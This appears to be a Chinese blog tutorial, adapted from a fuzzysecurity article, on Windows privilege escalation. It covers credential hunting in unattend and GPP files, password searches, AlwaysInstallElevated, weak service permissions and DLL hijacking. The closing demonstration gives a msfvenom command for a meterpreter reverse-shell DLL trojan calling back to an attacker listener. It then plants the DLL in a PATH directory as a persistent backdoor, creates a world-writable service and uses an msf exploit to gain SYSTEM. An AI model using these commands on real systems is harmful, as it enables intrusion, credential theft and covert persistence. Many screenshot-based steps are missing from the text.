Window 提權(quán)基礎(chǔ)

時(shí)間：2023-06-30 15:12:01 | 來源：網(wǎng)站運(yùn)營

時(shí)間：2023-06-30 15:12:01 來源：網(wǎng)站運(yùn)營

Window 提權(quán)基礎(chǔ)：本篇教程是筆者翻譯國外大牛 fuzzysecurity 的文章

http://www.fuzzysecurity.com/tutorials/16.html

再加上個(gè)人的理解寫出的關(guān)于 Windows 提權(quán)基礎(chǔ)的文章，其中有些地方因?yàn)椴惶珜?shí)用所以做了適當(dāng)修改，感謝 @hl0rey 的幫助和建議。

Indispensable Resources:

Encyclopaedia Of Windows Privilege Escalation (Brett Moore)

https://www.youtube.com/watch?v=kMG8IsCohHA

Windows Attacks: AT is the new black (Chris Gates & Rob Fuller)

https://www.youtube.com/watch?v=_8xJaaQlpBo

Elevating privileges by exploiting weak folder permissions (Parvez Anwar)

http://www.greyhathacker.net/?p=738

Δt for t0 to t3 - Initial Information Gathering

這個(gè)教程從 Windows 的低權(quán)限 shell 開始講述如何提權(quán)。我們可能利用某個(gè) EXP 或者從客戶端攻擊取得了一個(gè)反彈 shell 。最開始我們還不了解這臺計(jì)算機(jī)，不知道它是干什么用的，連接到哪里，有什么等級的權(quán)限或者甚至不知道它是什么操作系統(tǒng)。

最初我們希望快速的收集一些重要的信息，以便我們能夠評估我們所處的狀況，并作出正確的判斷！

首先查看連接的是什么操作系統(tǒng)：







接下來查看主機(jī)名和當(dāng)前shell 的用戶名：







現(xiàn)在我們已經(jīng)有了基本信息，讓我們繼續(xù)列出其他的用戶賬號名并查看我們自己更詳細(xì)的信息。能夠看到我們的賬號 user1 不在 localgroup Administrators 中，不是管理員賬號。







以上就是我們目前需要了解的用戶和權(quán)限信息。接下來我們查看網(wǎng)絡(luò)配置信息。

首先我們查看可用的網(wǎng)卡和路由表



















下面使用 netstat 命令查看主機(jī)的網(wǎng)絡(luò)連接和防火墻規(guī)則



















最后我們簡單的看看主機(jī)運(yùn)行的內(nèi)容：計(jì)劃任務(wù)、正在運(yùn)行的進(jìn)程、已經(jīng)啟動的服務(wù)和已經(jīng)安裝的驅(qū)動

Δt for t4 - The Arcane Arts Of WMIC

我想要單獨(dú)提及一下 WMIC (Windows Management Instrumentation Command-Line) ，因?yàn)樗?Windows 最有用的命令行工具。WMIC 對于信息收集和后滲透來說非常有用。不過這個(gè)工具比較重量級，所以不會一一介紹它的所有功能。

下面鏈接有關(guān)于它的詳細(xì)使用教程，有興趣的可以去自己翻譯看看：

Windows WMIC Command Line (ComputerHope)

https://www.computerhope.com/wmic.htm

令人遺憾的是有些 Windows 的默認(rèn)配置不允許使用 WMIC，除非用戶是在管理員組里面。從對 WMIC 的測試中我注意到任何版本的 XP 系統(tǒng)都不允許低權(quán)限賬號使用 WMIC。相反，默認(rèn)安裝的 Windows 7 Professional 和 Windows 8 企業(yè)版卻允許使用低權(quán)限賬號使用 WMIC 來查詢系統(tǒng)信息而不需要修改任何設(shè)置。驚不驚喜，意不意外？

為了簡化操作，貢獻(xiàn)社會，方便大家，我寫了一個(gè)自動化腳本，它將利用 WMIC 收集以下信息：進(jìn)程，服務(wù)，用戶帳戶，用戶組，網(wǎng)絡(luò)接口，硬盤驅(qū)動器信息，網(wǎng)絡(luò)共享信息，已安裝的 Windows 補(bǔ)丁程序，啟動時(shí)運(yùn)行的程序，已安裝軟件列表，操作系統(tǒng)和時(shí)區(qū)信息。

你可以從這里下載我的腳本

http://www.fuzzysecurity.com/tutorials/files/wmic_info.rar

你也可以從這里下載我利用腳本收集的信息樣本

http://www.fuzzysecurity.com/tutorials/files/Win7.html

Δt for t5 to t6 - Quick Fails

繼續(xù)后續(xù)步驟之前，你應(yīng)該花一點(diǎn)時(shí)間回顧以下剛才所收集到的信息，因?yàn)楝F(xiàn)在我們已經(jīng)得到操作系統(tǒng)大量的有用信息了.

盡管已經(jīng)通過我的 WMIC 腳本收集到主機(jī)的補(bǔ)丁信息了，但是我們?nèi)匀豢梢酝ㄟ^下面的命令來手動收集。







提權(quán)的 EXP 就那么幾個(gè)，可以查看一下系統(tǒng)是否打有相關(guān)漏洞的補(bǔ)丁，沒打補(bǔ)丁就嘿嘿嘿了，常見的 EXP 有這些:

https://github.com/SecWiki/windows-kernel-exploits

大家可以下載對應(yīng)版本的 Windows 試試這些 EXP。







下一個(gè)情景是如果某個(gè)環(huán)境中有大量的機(jī)器需要被安裝，那么技術(shù)人員通常不會一個(gè)接一個(gè)機(jī)器的去安裝，他們通常會選擇自動化安裝，這就可能會遺留下安裝過程的配置文件，這些配置文件中會包含許多敏感信息，例如管理員賬號密碼，如果能得到這些信息將極大的幫助我們提權(quán)。

通常這些敏感文件會出現(xiàn)在下面目錄中：

c:/sysprep.inf
c:/sysprep/sysprep.xml
%WINDIR%/Panther/Unattend/Unattended.xml
%WINDIR%/Panther/Unattended.xml

這些配置文件極可能包含明文密碼，也可能會出現(xiàn) base64 編碼的情況，下面是一些配置文件的事例：







GPO 首選項(xiàng)文件可用于在域計(jì)算機(jī)上創(chuàng)建本地用戶，當(dāng)你控制的主機(jī)連接在域中時(shí)，那么就非常值得去看看存儲在 SYSVOL 中的 Groups.xml 文件，任何經(jīng)過身份認(rèn)證的用戶都可以讀取該文件。盡管 xml 文件中的密碼通過使用 AES 加密來保證安全性，但是通過 msdn 發(fā)布的靜態(tài)密鑰可以很輕松的解密。







除了 Groups.xml 以外，其他幾個(gè)策略首選項(xiàng)文件也可能存在 "cPassword" 屬性

Services/Services.xml: Element-Specific Attributes
ScheduledTasks/ScheduledTasks.xml: Task Inner Element, TaskV2 Inner Element, ImmediateTaskV2 Inner Element
Printers/Printers.xml: SharedPrinter Element
Drives/Drives.xml: Element-Specific Attributes
DataSources/DataSources.xml: Element-Specific Attributes

如下所示，可以通過手動瀏覽 SYSVOL 并獲取相關(guān)文件來利用此漏洞。







除了上面手動查找首選項(xiàng)文件之外，我們也可以利用自動化工具來幫助我們達(dá)到目的。

可以利用 msf 中的一個(gè)后滲透模塊來實(shí)現(xiàn)自動化 post/windows/gather/credentials/gpp

https://www.rapid7.com/db/modules/post/windows/gather/credentials/gpp

接下來我們要查找一個(gè)奇怪的注冊表設(shè)置 "AlwaysInstallElevated" , 如果啟動此設(shè)置，它會允許任何用戶將 *.msi 文件安裝為 NT AUTHORITY / SYSTEM 。

為了能夠利用這個(gè)，我們需要檢查兩個(gè)注冊表項(xiàng)是否已經(jīng)設(shè)置，如果在這種情況下我們能夠彈出 SYSTEM shell. 通過下面的命令可以查看注冊表項(xiàng)是否啟動。不過筆者測試時(shí)發(fā)現(xiàn)自己的 Windows7 并沒有這兩個(gè)鍵值。

This will only work if both registry keys contain "AlwaysInstallElevated" with DWORD values of 1.

C:/Windows/system32> reg query HKLM/SOFTWARE/Policies/Microsoft/Windows/Installer/AlwaysInstallElevated
C:/Windows/system32> reg query HKCU/SOFTWARE/Policies/Microsoft/Windows/Installer/AlwaysInstallElevated

最后我們也可能通過下面的命令來挖到未知的寶藏

The command below will search the file system for file names containing certain keywords. You can specify as many keywords as you wish.

C:/Windows/system32> dir /s *pass* == *cred* == *vnc* == *.config*

Search certain file types for a keyword, this can generate a lot of output.

C:/Windows/system32> findstr /si password *.xml *.ini *.txt

Similarly the two commands below can be used to grep the registry for keywords, in this case "password".

C:/Windows/system32> reg query HKLM /f password /t REG_SZ /s
C:/Windows/system32> reg query HKCU /f password /t REG_SZ /s

Δt for t7 to t10 - Roll Up Your Sleeves

希望到目前為止我們已經(jīng)成功提權(quán)，如果確實(shí)還沒有成功提權(quán)的話下面還有一些攻擊方法。在這最后一部分，我們會查看 Windows 服務(wù)和文件/文件夾 權(quán)限，我們的目的是利用弱權(quán)限來進(jìn)行提權(quán)。當(dāng)然這里最主要是針對 Windows XP 系統(tǒng)。

接下來我們將利用一個(gè) Windows 中大神級的工具集 Sysinternals Suite 中的 accesschk.exe 來批量檢查權(quán)限信息，讀者可以從這里下載這個(gè)工具集

https://download.sysinternals.com/files/SysinternalsSuite.zip

接下來我們從 Windows 的服務(wù)開始，通過重新配置 service 的參數(shù)能夠讓我們快速達(dá)到目的。







我們也可以使用 accesschk 來檢查每個(gè)服務(wù)的權(quán)限級別







Accesschk 能夠自動檢查在某個(gè)用戶等級下我們對于 Windows 服務(wù)是否具有寫入權(quán)限。作為一個(gè)低權(quán)限的用戶，我們通常會想要去檢查 "Authenticated Users" 。

咱們來比較一下在 Windows 8 和 Windows XP SP0 中輸出的不同,







通過以上信息，我們能看到 upnphost 具有很大的權(quán)限，下面我將演示一下如何實(shí)際應(yīng)用這些信息來反彈 system shell













下圖列出了關(guān)于 Windows 提權(quán)的一些介紹，任何這些訪問權(quán)限都將給我們帶來 SYSTEM shell.







以上大部分都是根據(jù)外文翻譯過來的，然后我做了適當(dāng)修改，再次感謝大哥 @hl0rey 的建議和幫助，下面大家講一講我自己的騷姿勢，雖然技術(shù)內(nèi)容都不是我自己發(fā)明的，但是我將幾種技術(shù)雜糅在一起之后居然產(chǎn)生了讓我自己都感到驚訝的效果??！

DLL 劫持原理

程序通常不能靠自己自動運(yùn)行，它們往往需要調(diào)用許多資源（主要是 DLL 文件，Windows 中的動態(tài)鏈接庫）。如果程序或者服務(wù)從一個(gè)我們擁有寫權(quán)限的目錄里加載文件時(shí)，我們就能夠利用這一點(diǎn)來彈 shell，當(dāng)然這個(gè) shell 的權(quán)限也就是該程序所擁有的權(quán)限。

通常來說 Windows 程序會使用一個(gè)預(yù)定義搜索路徑去尋找 DLL 文件，并且會按照特定的順序來檢索這些路徑。當(dāng)將惡意的 DLL 文件放到其中一個(gè)路徑下，并保證該惡意 DLL 先于合法的 DLL 被程序找到時(shí)就會發(fā)生 DLL 劫持；也可能是程序?qū)ふ业?DLL 文件名在系統(tǒng)中并不存在，這時(shí)我們只需將自己定制的 DLL 文件放到程序的搜索路徑也可以達(dá)到目的

下面你可以看到在一個(gè) 32 位系統(tǒng)中 DLL 的搜索順序：

1 - The directory from which the application loaded
2 - 32-bit System directory (C:/Windows/System32)
3 - 16-bit System directory (C:/Windows/System)
4 - Windows directory (C:/Windows)
5 - The current working directory (CWD)
6 - Directories in the PATH environment variable (system then user)

通過上面的搜索路徑可以看到第六點(diǎn)環(huán)境變量，這也是我們比較容易控制的路徑，如果目標(biāo)裝有 python，那么 Path = C:/Python27 就是我們可以控制的路徑，我們只需要將惡意定制的 DLL 文件放到這個(gè)目錄就可以。

實(shí)戰(zhàn)演示

1、首先我在本站上隨便搜了點(diǎn)關(guān)于 Windows 中的軟件，然后隨便選了一個(gè)感覺可能存在 DLL 劫持的軟件安裝到我的 Windows 7 虛擬機(jī)中







2、然后調(diào)用工具 DllHijackAuditor

https://securityxploded.com/getsoftware_direct.php?id=7777

自動檢測我們剛才下載的軟件是否存在 DLL 劫持，根據(jù)下圖可以看到這里面存在一共 5 個(gè) DLL 文件可供我們惡意劫持，這是我沒想到的，我確實(shí)是在網(wǎng)上隨便搜了一個(gè)軟件而已，沒想到居然會這么不經(jīng)摧折！







3、接下來我們利用 msfvenom 生成文件名為 ext-ms-win-kernel32-package-current-l1-1-0.dll 的 DLL 木馬，用于進(jìn)行 DLL 劫持。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.175.143 lport=4444 -f dll -o /root/ext-ms-win-kernel32-package-current-l1-1-0.dll

4、查看 Windows 的環(huán)境變量，并將 DLL 木馬文件放入可控的環(huán)境變量中,這樣當(dāng)我們啟動 CCleaner 軟件的時(shí)候就會調(diào)用我們的 DLL 木馬文件反彈 shell

echo %path%

5、啟動 msf 的監(jiān)聽模式，默默等待用戶執(zhí)行軟件，可以看到我們現(xiàn)在只是普通管理員權(quán)限



















6、從 meterpreter 進(jìn)入 shell 模式，然后我們手動構(gòu)建一個(gè)存在漏洞的服務(wù)，以便后續(xù)進(jìn)行提權(quán)到 SYSTEM

sc create "times0ng test" binPath= "C:/Program Files (x86)/times0ng test/just test/evil.exe" start= auto
cd C:/Program Files (x86)
mkdir "times0ng test/just test"
icacls "C:/Program Files (x86)/times0ng test" /grant Everyone:(OI)(CI)F /T

7、調(diào)用 msf 的提權(quán)模塊進(jìn)行提權(quán)，可以看到我們很容易就取得了 SYSTEM 權(quán)限

use exploit/windows/local/trusted_service_path

8、重啟 win 7 ，我們的 DLL 木馬仍然靜靜地躺在那里充當(dāng)著忠實(shí)可靠的后門，一旦用戶執(zhí)行 CCleaner 就會觸發(fā)木馬（想象一下如果把 CCleaner 換成系統(tǒng)服務(wù)，還是開機(jī)自動啟動項(xiàng)，那么一旦用戶重啟計(jì)算機(jī)就會觸發(fā)后門反彈給我們 SYSTEM shell）

結(jié)語

希望大家能夠喜歡，有更好的想法歡迎留言，或者進(jìn)群交流！